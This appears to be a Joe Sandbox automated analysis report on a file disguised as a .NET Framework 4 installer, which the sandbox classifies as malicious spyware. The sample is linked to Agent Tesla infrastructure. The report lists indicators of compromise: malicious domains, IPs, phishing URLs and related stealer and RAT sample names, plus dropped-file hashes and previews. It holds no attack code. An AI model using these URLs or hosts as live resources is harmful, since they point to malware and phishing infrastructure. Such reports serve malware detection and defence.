                                        		rakishev.netUnited States
                                        		13335CLOUDFLARENETUSfalse

                                        General Information

                                        Joe Sandbox Version:38.0.0 Ammolite
                                        Analysis ID:1319489
                                        Start date and time:2023-10-04 15:57:05 +02:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 10m 38s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:34
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample file name:dotNetFx40_Full_setup.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@13/135@2/2
                                        EGA Information:
                                        • Successful, ratio: 75%
                                        HCA Information:
                                        • Successful, ratio: 92%
                                        • Number of executed functions: 331
                                        • Number of non-executed functions: 91
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, WmiApSrv.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 52.113.194.132
                                        • Excluded domains from analysis (whitelisted): www.bing.com, ecs.office.com, ocsp.digicert.com, login.live.com, s-0005.s-msedge.net, ctldl.windowsupdate.com, tse1.mm.bing.net, ecs.office.trafficmanager.net, s-0005-office.config.skype.com, arc.msn.com, ecs-office.s-0005.s-msedge.net
                                        • Execution Graph export aborted for target dotNetFx40_Full_setup.exe, PID 6744 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                        • Report size getting too big, too many NtOpenKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        15:57:58API Interceptor67x Sleep call for process: EQB4OREJ.exe modified
                                        15:58:00API Interceptor10331438x Sleep call for process: splwow64.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        208.95.112.1Stealer.exeGet hashmaliciousPhoenix Stealer, VidarBrowse
                                        • ip-api.com/xml/184.170.240.238
                                        xqnoOIWFbr2N.exeGet hashmaliciousQuasarBrowse
                                        • ip-api.com/json/
                                        X2tjymwbS4.exeGet hashmaliciousBunny LoaderBrowse
                                        • ip-api.com/csv
                                        proof_of_payment.jsGet hashmaliciousWSHRATBrowse
                                        • ip-api.com/json/
                                        xBqAmJwby407.exeGet hashmaliciousQuasarBrowse
                                        • ip-api.com/json/
                                        n3DPQm1UPK.exeGet hashmaliciousPhemedrone StealerBrowse
                                        • ip-api.com/json/?fields=11827
                                        n3DPQm1UPK.exeGet hashmaliciousPhemedrone StealerBrowse
                                        • ip-api.com/json/?fields=11827
                                        BIN.exeGet hashmaliciousRedLine, WSHRATBrowse
                                        • ip-api.com/json/
                                        Required_Aircraft_PN#_List.vbsGet hashmaliciousQuasarBrowse
                                        • ip-api.com/json/
                                        X5syM7G5V6.exeGet hashmaliciousRedLine, WSHRATBrowse
                                        • ip-api.com/json/
                                        Open_Invoice.pdf.jarGet hashmaliciousSTRRATBrowse
                                        • ip-api.com/line/102.129.145.97
                                        #U6536#U64da000951496.xlsx.jarGet hashmaliciousSTRRATBrowse
                                        • ip-api.com/line/102.129.145.97
                                        Open_Invoice.pdf.jarGet hashmaliciousSTRRATBrowse
                                        • ip-api.com/line/102.129.145.97
                                        00301830595702.xlsx.jarGet hashmaliciousSTRRATBrowse
                                        • ip-api.com/line/102.129.145.97
                                        #U6536#U64da000951496.xlsx.jarGet hashmaliciousSTRRATBrowse
                                        • ip-api.com/line/102.129.145.97
                                        00301830595702.xlsx.jarGet hashmaliciousSTRRATBrowse
                                        • ip-api.com/line/102.129.145.97
                                        2aP7Sugf2I.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                        • ip-api.com/line/?fields=hosting
                                        a967rQFLum.exeGet hashmaliciousRedLine, WSHRATBrowse
                                        • ip-api.com/json/
                                        Facebook_Advertising_-_Document_slides_-_S_-_New_Campaign_2023_-_Digital_Marketing_Plan.exeGet hashmaliciousUnknownBrowse
                                        • ip-api.com/json/?fields=61439
                                        Cheat.Lab.2.7.0.msiGet hashmaliciousUnknownBrowse
                                        • ip-api.com/json/?fields=query,status,countryCode,city,timezone

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        rakishev.net65ofAI8Pz7.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                        • 104.21.88.34
                                        Wallpaper.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                        • 172.67.150.79
                                        Wallpaper.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                        • 104.21.88.34
                                        openssl.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                        • 172.67.150.79
                                        openssl.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                        • 172.67.150.79
                                        wireguard-pro.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                        • 104.21.88.34
                                        wireguard-pro.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                        • 172.67.150.79
                                        update.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                        • 172.67.150.79
                                        Overwatch-Setup.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                        • 104.21.88.34
                                        ip-api.comStealer.exeGet hashmaliciousPhoenix Stealer, VidarBrowse
                                        • 208.95.112.1
                                        xqnoOIWFbr2N.exeGet hashmaliciousQuasarBrowse
                                        • 208.95.112.1
                                        X2tjymwbS4.exeGet hashmaliciousBunny LoaderBrowse
                                        • 208.95.112.1
                                        file.exeGet hashmaliciousAmadey, Babadeda, Healer AV Disabler, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                        • 208.95.112.1
                                        proof_of_payment.jsGet hashmaliciousWSHRATBrowse
                                        • 208.95.112.1
                                        https://bafkreiais4dunagcgilxllob4kqwnh3wzk5rp5ab56ydlamnysg2vrx2ya.ipfs.dweb.link/#giles_pearson@edinburghairport.comGet hashmaliciousHTMLPhisherBrowse
                                        • 208.95.112.2
                                        #Ud83d#Udcc4october_payroll_payment023.htmGet hashmaliciousHTMLPhisherBrowse
                                        • 208.95.112.2
                                        xBqAmJwby407.exeGet hashmaliciousQuasarBrowse
                                        • 208.95.112.1
                                        https://bafkreihcm5xokc7imkphifllh5e33ocm6xu4ezcavtsnepjvbbe7tcdo2a.ipfs.dweb.linkGet hashmaliciousHTMLPhisherBrowse
                                        • 208.95.112.2
                                        n3DPQm1UPK.exeGet hashmaliciousPhemedrone StealerBrowse
                                        • 208.95.112.1
                                        n3DPQm1UPK.exeGet hashmaliciousPhemedrone StealerBrowse
                                        • 208.95.112.1
                                        BIN.exeGet hashmaliciousRedLine, WSHRATBrowse
                                        • 208.95.112.1
                                        Required_Aircraft_PN#_List.vbsGet hashmaliciousQuasarBrowse
                                        • 208.95.112.1
                                        X5syM7G5V6.exeGet hashmaliciousRedLine, WSHRATBrowse
                                        • 208.95.112.1
                                        Open_Invoice.pdf.jarGet hashmaliciousSTRRATBrowse
                                        • 208.95.112.1
                                        #U6536#U64da000951496.xlsx.jarGet hashmaliciousSTRRATBrowse
                                        • 208.95.112.1
                                        Open_Invoice.pdf.jarGet hashmaliciousSTRRATBrowse
                                        • 208.95.112.1
                                        00301830595702.xlsx.jarGet hashmaliciousSTRRATBrowse
                                        • 208.95.112.1
                                        #U6536#U64da000951496.xlsx.jarGet hashmaliciousSTRRATBrowse
                                        • 208.95.112.1
                                        00301830595702.xlsx.jarGet hashmaliciousSTRRATBrowse
                                        • 208.95.112.1

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CLOUDFLARENETUShttp://streaklinks.com/Brxjg9dLCzM14sYlGwt8OQSo/https://tracking.vocus.io/link?id=4da69142-f92b-4bbd-8392-f4b4315ea8bd#SmZpc2hlckBjaHMtYWRwaGlsYS5vcmc=&4bbd-8392Get hashmaliciousUnknownBrowse
                                        • 104.18.43.31
                                        Setup_win64_2.49.0.4_release.exeGet hashmaliciousLummaC StealerBrowse
                                        • 104.21.91.27
                                        VNpromt_19705709038_1000_20230927243437.htmGet hashmaliciousHTMLPhisherBrowse
                                        • 104.17.25.14
                                        SecuriteInfo.com.Gen.Variant.Nemesis.1781.26240.30029.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                        • 23.227.38.74
                                        http://tracking.compliancestrain.com/tracking/click?d=bqs7JtdvHm_6E4rH_XV6OoKE_XOn9VG3VaO6vtPTPcwCjkTwPQ3ulS-eyx0hrf2rdloCMXvm8VqcJMeLUViiTa91wOtSBYYT79xZ1cS2K_tSmmD5qR7HMTH1lcLGWK8yBTSPyVKuFvAoQ-N6Sv0h_3siJ67SsXCRVw3rzriz4CVf70b_mdNSlmZQnP1iZBUPK4d02nLBekej0aKntOXFXjeBg1AR7tslePifN3yXUxJdbR_XL4Vg2w3VAWK0bhs7rjY7bJLVH2NcPnNSrcg5AgcxCOIxlYKU86lchWe8udfWAcaNoskeOUK-TaPhylupGbvNeDOKSyFr-TCdA1ruWEf1jPem27CSiu1U7jQgTWgqVeCRu0OKfl8ju8pUr7yidQ2Get hashmaliciousUnknownBrowse
                                        • 1.1.1.1
                                        http://tracking.compliancestrain.com/tracking/unsubscribe?d=9LQByn4BWsQCDWNFYUtZTw2xYspSuuxQgxYc32KQXEWC_nM36r1nyGR0WDzh0IsGw3PTaNeLvw27_1q7z_T7-97emiCjAmDtU369p_IYoLxM0Get hashmaliciousUnknownBrowse
                                        • 1.1.1.1
                                        https://90d6c16a9d874eb58b31908bf6333965.svc.dynamics.com/f/w/easternGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                        • 104.17.3.184
                                        http://tracking.compliancestrain.com/tracking/open?msgid=nkVWabygsA9s2V5xOxSmAA2&c=1709240593156251838Get hashmaliciousUnknownBrowse
                                        • 1.1.1.1
                                        szhD0Z5GAg.elfGet hashmaliciousMiraiBrowse
                                        • 188.114.96.98
                                        Stealer.exeGet hashmaliciousPhoenix Stealer, VidarBrowse
                                        • 104.18.114.97
                                        https://clicksmail.medscape.org/e-t-p?clientId=7000929&sendId=5475311&subscriberId=MjUxNDM2MzM=&istId=istId&eventDate=2023-05-2923:00:39&eventType=article_link_click&sendUrlId=sendUrlId&urlId=urlId&alias=alias&batchId=batchId&triggeredSendExternalKey=ese-prod-5008584-perform-key&url=http://1edmlo.admiresupportservices.com.au/ZnJhemVyLnJhbWFnZUBtYWdhaXJwb3J0cy5jb20=Get hashmaliciousUnknownBrowse
                                        • 104.17.2.184
                                        VM_299366592023.htmlGet hashmaliciousHTMLPhisherBrowse
                                        • 104.21.54.78
                                        https://carrierr.co/?caexgyrw&qrc=Get hashmaliciousUnknownBrowse
                                        • 104.16.57.101
                                        https://anonymfile.com/r0V4/azb01.txtGet hashmaliciousUnknownBrowse
                                        • 104.22.50.93
                                        ADVERTENCIA-606bbf7bd56166yuicf.msiGet hashmaliciousUnknownBrowse
                                        • 1.1.1.1
                                        https://head.fastfunnels.com/Get hashmaliciousHTMLPhisherBrowse
                                        • 104.17.25.14
                                        https://wholedailyjournal.com?s=732623244276011683&ssk=e7e30784eb7dfa1d93ce41aa0e22301b&svar=1696234512&z=6246380&pz=4662709&tb=4662728&l=wgyvpknmpvy53zbGet hashmaliciousUnknownBrowse
                                        • 172.67.185.218
                                        SWIFT-amount_of_58,483.docx.docGet hashmaliciousRemcosBrowse
                                        • 172.67.215.45
                                        65ofAI8Pz7.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                        • 104.21.88.34
                                        0433 (2).docGet hashmaliciousUnknownBrowse
                                        • 104.16.126.175
                                        TUT-ASUSStealer.exeGet hashmaliciousPhoenix Stealer, VidarBrowse
                                        • 208.95.112.1
                                        xqnoOIWFbr2N.exeGet hashmaliciousQuasarBrowse
                                        • 208.95.112.1
                                        X2tjymwbS4.exeGet hashmaliciousBunny LoaderBrowse
                                        • 208.95.112.1
                                        proof_of_payment.jsGet hashmaliciousWSHRATBrowse
                                        • 208.95.112.1
                                        https://bafkreiais4dunagcgilxllob4kqwnh3wzk5rp5ab56ydlamnysg2vrx2ya.ipfs.dweb.link/#giles_pearson@edinburghairport.comGet hashmaliciousHTMLPhisherBrowse
                                        • 208.95.112.2
                                        #Ud83d#Udcc4october_payroll_payment023.htmGet hashmaliciousHTMLPhisherBrowse
                                        • 208.95.112.2
                                        xBqAmJwby407.exeGet hashmaliciousQuasarBrowse
                                        • 208.95.112.1
                                        https://bafkreihcm5xokc7imkphifllh5e33ocm6xu4ezcavtsnepjvbbe7tcdo2a.ipfs.dweb.linkGet hashmaliciousHTMLPhisherBrowse
                                        • 208.95.112.2
                                        n3DPQm1UPK.exeGet hashmaliciousPhemedrone StealerBrowse
                                        • 208.95.112.1
                                        n3DPQm1UPK.exeGet hashmaliciousPhemedrone StealerBrowse
                                        • 208.95.112.1
                                        BIN.exeGet hashmaliciousRedLine, WSHRATBrowse
                                        • 208.95.112.1
                                        Required_Aircraft_PN#_List.vbsGet hashmaliciousQuasarBrowse
                                        • 208.95.112.1
                                        X5syM7G5V6.exeGet hashmaliciousRedLine, WSHRATBrowse
                                        • 208.95.112.1
                                        Open_Invoice.pdf.jarGet hashmaliciousSTRRATBrowse
                                        • 208.95.112.1
                                        #U6536#U64da000951496.xlsx.jarGet hashmaliciousSTRRATBrowse
                                        • 208.95.112.1
                                        Open_Invoice.pdf.jarGet hashmaliciousSTRRATBrowse
                                        • 208.95.112.1
                                        00301830595702.xlsx.jarGet hashmaliciousSTRRATBrowse
                                        • 208.95.112.1
                                        #U6536#U64da000951496.xlsx.jarGet hashmaliciousSTRRATBrowse
                                        • 208.95.112.1
                                        00301830595702.xlsx.jarGet hashmaliciousSTRRATBrowse
                                        • 208.95.112.1
                                        2aP7Sugf2I.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                        • 208.95.112.1

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\6c8944922f7b98d0b6cd82b768\1029\SetupResources.dlldotNetFx40_Full_x86_x64.exeGet hashmaliciousUnknownBrowse
                                          https://gscs-b2c.lge.com/downloadFile?fileId=JCmfbdhuo6i4ujSC2MbC6QGet hashmaliciousUnknownBrowse
                                            C:\6c8944922f7b98d0b6cd82b768\1028\SetupResources.dllScotiabank_Scanner_Driver_DigitalCheck-42180-1310v3.exeGet hashmaliciousUnknownBrowse
                                              http://download.arxivar.it/Tools/Prerequisiti/vcredist_x86_2010.zipGet hashmaliciousUnknownBrowse
                                                https://files.jalinga.com/builds/releases/jalinga_studio.4.0.2040.0.exeGet hashmaliciousUnknownBrowse
                                                  dotNetFx40_Full_x86_x64.exeGet hashmaliciousUnknownBrowse
                                                    https://gscs-b2c.lge.com/downloadFile?fileId=JCmfbdhuo6i4ujSC2MbC6QGet hashmaliciousUnknownBrowse
                                                      TinyTakeSetup_v_5_2_16.exeGet hashmaliciousUnknownBrowse
                                                        C:\6c8944922f7b98d0b6cd82b768\1025\SetupResources.dlldotNetFx40_Full_x86_x64.exeGet hashmaliciousUnknownBrowse
                                                          https://gscs-b2c.lge.com/downloadFile?fileId=JCmfbdhuo6i4ujSC2MbC6QGet hashmaliciousUnknownBrowse

                                                            Created / dropped Files

                                                            C:\6c8944922f7b98d0b6cd82b768\1025\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (627), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):74214
                                                            Entropy (8bit):4.180711029644354
                                                            Encrypted:false
                                                            SSDEEP:384:4w1hDxsSsxGMZzhKtQOsitz0SBijTJ3ejrwddv:PhDxsnxGMdAVBijTJ3eHm
                                                            MD5:C5BF74C96A711B3F7004CA6BDDECC491
                                                            SHA1:4C4D42FF69455F267CE98F1DB8F2C5D76A1046DA
                                                            SHA-256:6B67C8A77C1A637B72736595AFDF77BDB3910AA9FE48D959775806A0683FFA66
                                                            SHA-512:2F2071BF9966BFFE64C90263F4B9BD5EFCAC4F976C4E42FBDEAA5D6A6DEE51C33F4902CF5E3D0897E1C841E9182E25C86D42E392887BC3CE3D9ED3D780D96AC9
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".. . J.*.9.0.1. .*.4.:.J.D. .'.D.%.9./.'./. .A.J. .H.6.9. .'.D.*.H.'.A.B... .D.E.2.J./. .E.F. .'.D.E.9.D.H.E.'.*... .1.'.,.9. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.'.D.E.D.A. .'.D.*.E.G.J./.J.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.

                                                            C:\6c8944922f7b98d0b6cd82b768\1025\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):17240
                                                            Entropy (8bit):5.619267132242324
                                                            Encrypted:false
                                                            SSDEEP:192:Ea4ZUfwxW1NX2QxqaSzWUrfncpNWLIeWkQKPnEtObMacxc8hjXHUz1TrOKA+nfW6:Nx2SX2vPzBrSNWkeWkLXci2jXHU46iQ
                                                            MD5:35B62B395968B7754C298FBB410E9821
                                                            SHA1:DE95297EE33466DDA2A63C8658E79F17EBBB2911
                                                            SHA-256:4BC6711145430AC74F0D8F80A41DD89ACE79427EBAF7D3CFE479A43DB08D66E1
                                                            SHA-512:CD34802098D57CA81446B32D2CD39B3B3FA659ED0A366167C09DAD5FF583B2266E28BA044486E343E4336A40E85D4A713E4E67EAC00B6CBFC3D4C33A1B9BD23B
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Joe Sandbox View:
                                                            • Filename: dotNetFx40_Full_x86_x64.exe, Detection: malicious, Browse
                                                            • Filename: , Detection: malicious, Browse
                                                            Reputation:moderate, very likely benign file
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........(...............................................P............@.......................................... ...$...........,..X............................................................................................text...G...........................@..@.rsrc....0... ...&..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1025\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1256, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):7567
                                                            Entropy (8bit):4.307679152385702
                                                            Encrypted:false
                                                            SSDEEP:192:sf3yLpQxL75CD7sH08JUXthIT2M+bOx7BnT7QUm2:AyLpQxL7YsH08JUXQT2M+s7BnT7QUm2
                                                            MD5:AF1A4F6740A8B51683DFD89D520EB729
                                                            SHA1:6B02C8E704D2D90DE9E0B63FA389B2899C75E567
                                                            SHA-256:E4BA6C3852C94BB2034DFFED5A0FE45150E873B98ABA95A2C3A93A71227EF605
                                                            SHA-512:C669728CA1AF1513DB36EAEE9F15AA7B0209E2F9E85C7FAE759794D05DEEF2920712C9C6F7AAF4ED1B13BF83D310DF6E770CD6C9A49D7FE62FD5F9A11464B255
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:{\rtf1\fbidis\ansi\ansicpg1256\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset178 Tahoma;}{\f1\fswiss\fprq2\fcharset0 Tahoma;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\froman\fprq2\fcharset178 Times New Roman;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\rtlpar\nowidctlpar\sb120\sa120\qr\lang1025\b\f0\rtlch\fs20\'c7\'e1\'d4\'d1\'e6\'d8 \'c7\'e1\'c5\'d6\'c7\'dd\'ed\'c9 \'e1\'ca\'d1\'ce\'ed\'d5 \'c8\'d1\'e4\'c7\'e3\'cc \lang1033\f1\ltrch MICROSOFT\par..\pard\brdrb\brdrs\brdrw10\brsp20 \rtlpar\nowidctlpar\sb120\sa120\qr MICROSOFT .NET FRAMEWORK 4\lang1025\f0\rtlch \'e1\'e4\'d9\'c7\'e3 \'c7\'e1\'ca\'d4\'db\'ed\'e1 \lang1033\f1\ltrch WINDOWS\lang1025\f0\rtlch \'e3\'e4 \lang1033\f1\ltrch MICROSOFT\par..MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE\lang1025\f0\rtlch \'e1\'e4\'d9\'c7\'e3 \'c7\'e1\'ca\'d4\'db\'ed\'e1 \lang1033\f1\ltrch WINDOWS\lang1025\f0\rtlch \'e3\'e4 \lang1033\f1\ltrch MICROSOFT\f2\par..\lang3073\f

                                                            C:\6c8944922f7b98d0b6cd82b768\1028\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (457), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):60816
                                                            Entropy (8bit):4.3418522371704045
                                                            Encrypted:false
                                                            SSDEEP:384:4wCGbCWB6rFk+2jP8lxtrzh1hsPN7ODPnPgQy50sJCXnofDPiv:tbCWYFrewYTJCf
                                                            MD5:967A6D769D849C5ED66D6F46B0B9C5A4
                                                            SHA1:C0FF5F094928B2FA8B61E97639C42782E95CC74F
                                                            SHA-256:0BC010947BFF6EC1CE9899623CCFDFFD702EEE6D2976F28D9E06CC98A79CF542
                                                            SHA-512:219B13F1BEEB7D690AF9D9C7D98904494C878FBE9904F8CB7501B9BB4F48762F9D07C3440EFA0546600FF62636AC34CB4B32E270CF90CB47A9E08F9CB473030C
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."..[..z._!q.l(W.v.['`!j._.N.WL..0.Y..s.0}.......S..&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;....b.jHh&.l.t.;./.A.&.g.t.;..0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."..d..[. .M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. ..S...g.\..g.N.a(u.z._\PbkK.

                                                            C:\6c8944922f7b98d0b6cd82b768\1028\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):14168
                                                            Entropy (8bit):5.9724110685335825
                                                            Encrypted:false
                                                            SSDEEP:192:fc2+tUfwZWPl53LmlVlSW1g+/axw0lczWpXEWUQKPnEtObMacxc8hjeyveCXzHbk:hzuwLmlCW1g+/kmzWpXEWULXci2jpv3e
                                                            MD5:7C136B92983CEC25F85336056E45F3E8
                                                            SHA1:0BB527E7004601E920E2AAC467518126E5352618
                                                            SHA-256:F2E8CA58FA8D8E694D04E14404DEC4E8EA5F231D3F2E5C2F915BD7914849EB2B
                                                            SHA-512:06DA50DDB2C5F83E6E4B4313CBDAE14EED227EEC85F94024A185C2D7F535B6A68E79337557727B2B40A39739C66D526968AAEDBCFEF04DAB09DC0426CFBEFBF4
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Joe Sandbox View:
                                                            • Filename: Scotiabank_Scanner_Driver_DigitalCheck-42180-1310v3.exe, Detection: malicious, Browse
                                                            • Filename: , Detection: malicious, Browse
                                                            • Filename: , Detection: malicious, Browse
                                                            • Filename: dotNetFx40_Full_x86_x64.exe, Detection: malicious, Browse
                                                            • Filename: , Detection: malicious, Browse
                                                            • Filename: TinyTakeSetup_v_5_2_16.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................@......E.....@.......................................... ..X............ ..X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1028\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 950, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):6309
                                                            Entropy (8bit):4.470827969332999
                                                            Encrypted:false
                                                            SSDEEP:96:/R8NRf8TTVKTu4LuTu4LrzZD41raZM4HbegdxqKZJQ1/FSMZJujgzc/MpD1JzIf2:/R4Rfm2NBZMjOfro2n6CA2
                                                            MD5:6F2F198B6D2F11C0CBCE4541900BF75C
                                                            SHA1:75EC16813D55AAF41D4D6E3C8D4948E548996D96
                                                            SHA-256:D7D3CFBE65FE62DFA343827811A8071EC54F68D72695C82BEC9D9037D4B4D27A
                                                            SHA-512:B1F5B812182C7A8BF1C1A8D0F616B44B0896F2AC455AFEE56C44522B458A8638F5C18200A8FB23B56DC1471E5AB7C66BE1BE9B794E12EC06F44BEEA4D9D03D6F
                                                            Malicious:false
